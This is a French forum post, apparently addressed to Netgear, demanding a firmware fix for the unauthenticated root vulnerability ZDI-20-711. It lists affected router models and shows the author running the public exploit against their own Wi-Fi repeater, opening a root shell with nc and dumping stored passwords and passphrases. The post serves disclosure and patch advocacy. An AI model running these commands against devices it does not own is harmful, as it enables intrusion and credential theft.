Re: Correctif pour ZDI-20-711

Bonjour,

Il y a quelques jours, un exploit pour une vulnérabilité critique a été publié sur Internet. Celle-ci affecte de nombreux modèles de routeur ou repeteur Netgear. Elle permet de prendre l'accès complet sur l'appareil, sans authentification préalable. Je n'ai pas trouvé de CVE associé à cette vulnérabilité.

Voici quelques liens (en anglais) :

• https://blog.grimm-co.com/2020/06/soho-device-exploitation.html
• https://www.exploit-db.com/exploits/48588
• https://www.zerodayinitiative.com/advisories/ZDI-20-711/
• https://www.zerodayinitiative.com/advisories/ZDI-20-712/

Il est indiqué que 79 routeurs différents sont vulnérables. Voici la liste des modèles affectés qui ont été testés :

• D6300 version 1.0.0.90 and 1.0.0.102
• DGN2200 version 1.0.0.58
• DGN2200M version 1.0.0.35 and 1.0.0.37
• DGN2200v4 version 1.0.0.102
• R6250 versions 1.0.4.36 and 1.0.1.84
• R6300v2 version 1.0.3.6CH, 1.0.3.8, and 1.0.4.32
• R6400 version 1.0.1.20, 1.0.1.36, and 1.0.1.44
• R7000 versions 9.88, 9.64, 9.60, 9.42, 9.34, 9.18, 9.14, 9.12, 9.10, 9.6, and 8.34
• R8000 version 1.0.4.18, 1.0.4.46
• R8300 version 1.0.2.128 and 1.0.2.130
• R8500 version 1.0.0.28
• WGR614v9 version 1.2.32NA
• WGR614v10 version 1.0.2.66NA
• WGT624v4 version 2.0.12NA and 2.0.13.2
• WN3000RP versions 1.0.2.64 and 1.0.1.18
• WNDR3300 versions 1.0.45, 1.0.45NA, and 1.0.14NA
• WNDR3400 versions 1.0.0.52 and 1.0.0.38
• WNDR3400v2 versions 1.0.0.54 and 1.0.0.16
• WNDR3400v3 versions 1.0.1.24 and 1.0.0.38
• WNDR3700v3 versions 1.0.0.42, 1.0.0.38, and 1.0.0.18
• WNDR4000 versions 1.0.2.10, 1.0.2.4, and 1.0.0.82
• WNDR4500v2 versions 1.0.0.60 and 1.0.0.72
• WNR1000v3 version 1.0.2.72
• WNR2000v2 versions 1.2.0.8, 1.2.0.4NA, and 1.0.0.40
• WNR3500 version 1.0.36NA
• WNR3500L versions 1.2.2.48NA, 1.2.2.44NA, and 1.0.2.50
• WNR3500Lv2 version 1.2.0.56
• WNR834Bv2 version 2.1.13NA

Je l'ai testé aussi sur mon repeteur Wi-Fi WN3100RP version 1.0.0.20 et j'ai bien obtenu un shell root dessus :

$ python 48588 192.168.0.253
Automatically detected model WN3100RP and version 1.0.0.20
$ nc -v 192.168.0.253 8888  
Connection to 192.168.0.253 8888 port [tcp/*] succeeded!

BusyBox v0.60.0 (2018.08.23-08:23+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# cat /proc/version
Linux version 2.4.20 (rhaegar@sw-server-206) (gcc version 3.2.3 with Broadcom modifications) #18 Thu Aug 23 16:23:46 CST 2018

# nvram show | grep passwd
pptp_passwd=
pppoe2_west_passwd=flets
super_passwd=Geardog
bpa_passwd=
http_passwd=<redacted>
pppoe2_east_passwd=guest
ddns_passwd=
pppoe_passwd=
pppoe_tmp_passwd=
pppoe2_passwd=

# nvram show | grep passphrase
wla_temp_passphrase=
wla_passphrase_2=<redacted>
wla_passphrase_3=
wla_passphrase_4=
wla_passphrase=<redacted>
wla_temp_passphrase_2=

Cette vulnérabilité est extremement critique. D'après ZDI, Netgear a été mis au courant le 3 janvier 2020. Le second chercheur qui a trouvé la même vulnérabilité indépendamment l'a remontée début mai 2020. Or je ne vois aucun correctif pour mon repeteur Wi-Fi ou mon routeur N900, 6 mois plus tard !

Je poste donc ce message ici pour que Netgear publie au plus vite les firmwares correctifs.